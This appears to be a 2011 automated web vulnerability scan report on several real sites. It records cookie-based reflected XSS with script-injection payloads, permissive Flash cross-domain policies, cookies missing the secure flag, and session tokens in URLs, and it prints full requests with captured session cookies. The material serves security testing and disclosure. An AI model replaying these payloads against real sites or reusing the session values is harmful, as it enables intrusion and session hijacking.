<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46e75"%3balert(1)//7d4a5086234 was submitted in the chatslider cookie. This input was echoed as 46e75";alert(1)//7d4a5086234 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /what_is_cloud_computing/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D46e75"%3balert(1)//7d4a5086234; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 35540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec083"><script>alert(1)</script>6b28930fc7e was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /what_is_cloud_computing/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dec083"><script>alert(1)</script>6b28930fc7e; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 35584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 200c9"><script>alert(1)</script>3856619913c was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /who_uses_cloud_computing/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D200c9"><script>alert(1)</script>3856619913c; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 34407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59537"%3balert(1)//8b42036f44f was submitted in the chatslider cookie. This input was echoed as 59537";alert(1)//8b42036f44f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /who_uses_cloud_computing/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D59537"%3balert(1)//8b42036f44f; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 34341
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ib.adnxs.com
Response
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 06-Feb-2011 15:58:43 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/xml
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only" ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: htcwiki.wetpaint.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:58:45 GMT Server: Apache Last-Modified: Thu, 20 Jan 2011 12:18:52 GMT Accept-Ranges: bytes Content-Length: 411 Cache-Control: max-age=2592000 Expires: Mon, 07 Mar 2011 15:58:45 GMT Vary: Accept-Encoding Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from specific other domains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.informationweek.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:37 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:37 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=Q32YCNXR0XP5HQE1GHRCKHWATMY32JVN; path=/ Content-Length: 306 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.omniture.com
Response
HTTP/1.0 200 OK Server: Omniture AWS/2.0.0 Last-Modified: Wed, 18 Aug 2010 04:52:06 GMT ETag: "4c4094-280-d3cf2980" Accept-Ranges: bytes Content-Length: 640 xserver: www6.dmz Content-Type: application/xml Date: Sat, 05 Feb 2011 15:26:51 GMT Connection: close Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Customer HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 05 Feb 2011 15:26:07 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=9B54ECBB9503D534B0BE3EA941A0C545; Path=/isservices Location: https://admin.instantservice.com/customerclient_error.html?null Content-Length: 0 P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40197 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:20 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=81F131D8073ED15B811E4C1FE36C8025; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40203 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:28 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=8709282A5988046429A0C955793D5715; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40204 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:29 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=FFDC32970E960F468F2E92FD7CD06AEA; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40205 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:29 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=8431C159C7273C6E463B3FA784154B90; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40207 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:30 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=147E71C4861012CE4C15BE879164BC54; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40209 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:33 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=7B2969C78BCECF40F36FB4F43586FADB; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40533 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:34 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=1E9F062E280FCF6E94897547E2F872A5; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: affiliates.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Rackspace Cloud Affiliate Program ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login.do HTTP/1.1 Host: login.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:08:03 GMT Server: Apache Set-Cookie: JSESSIONID=A7BE43B9F2A2C99949EA16FFD7EA773F; Path=/ Set-Cookie: lr=null; Domain=login.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Language: en Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:08:03 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 8775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /register.do HTTP/1.1 Host: login.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:08:03 GMT Server: Apache Set-Cookie: JSESSIONID=638DAE29E54D3B65DC1E863BC5F6451F; Path=/ Content-Language: en Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:08:03 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 14688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /requestPasswordReset.do HTTP/1.1 Host: login.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=2&ab=0; JSESSIONID=8080169631484995FA78998C7A2FA96C; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; lr=null; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; __utmb=226091973.2.10.1296921579; __qca=P0-932105070-1296921578417; wptrk=sn=htcwiki&i=1;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:45:06 GMT Server: Apache Set-Cookie: JSESSIONID=9299013497D1B060B2050DDCD017F00D; Path=/ Content-Language: en Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:45:06 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 6068
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the secure flag set:
cpsid=0h0edc55b5reboaoagclwxnb; path=/; HttpOnly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /Login.aspx?reval=Log-In Error (Fields are case-sensitive) Server: Microsoft-IIS/7.5 Set-Cookie: cpsid=0h0edc55b5reboaoagclwxnb; path=/; HttpOnly X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 15:19:28 GMT Content-Length: 181
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fLogin.aspx%3freval%3dLog-In+Error+(Fields+are+case-sensitive)">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps HTTP/1.1 Host: maps-api-ssl.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b HTTP/1.1 Host: sb.voicefive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: https://sb.voicefive.com/b2? Date: Sat, 05 Feb 2011 15:42:01 GMT Connection: close Set-Cookie: UID=296258cf-184.84.78.110-1296920521; expires=Mon, 04-Feb-2013 15:42:01 GMT; path=/; domain=.voicefive.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: signup.apps.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 15:25:12 GMT Server: Apache/2.2.16 (EL) X-Powered-By: PHP/5.2.14 Set-Cookie: RACKSPACE_EA_SIGNUP=rnlbdhqan6or0lohbis5u5msc0; expires=Sat, 12-Feb-2011 15:25:12 GMT; path=/; secure P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: IS_UASrackuid=RSEAe637b439556529b6579e24418a8bbd7d; expires=Fri, 06-May-2011 15:25:12 GMT; path=/; domain=.rackspace.com Set-Cookie: IS_UASrackuid=RSEA97b6b0ea13f671bf95253b1627351fbf; expires=Fri, 06-May-2011 15:25:12 GMT; path=/; domain=.rackspace.com Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="X-UA-Compatible ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
symfony=asi2pdkfuampt70u2huh62lk35; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /signup HTTP/1.1 Host: signup.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Mosso Engineering) Content-Type: text/html; charset=utf-8 Date: Sat, 05 Feb 2011 15:25:19 GMT Keep-Alive: timeout=15, max=149 Connection: close Set-Cookie: symfony=asi2pdkfuampt70u2huh62lk35; path=/ X-Powered-By: PHP/5.2.6 Content-Length: 17012
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
GET /page/Smartphone+ROMs HTTP/1.1 Host: htcwiki.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:00:20 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=4B8C85709C6AFD21174C5CE4D8F87165; Path=/ Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:00:20 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 142277
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
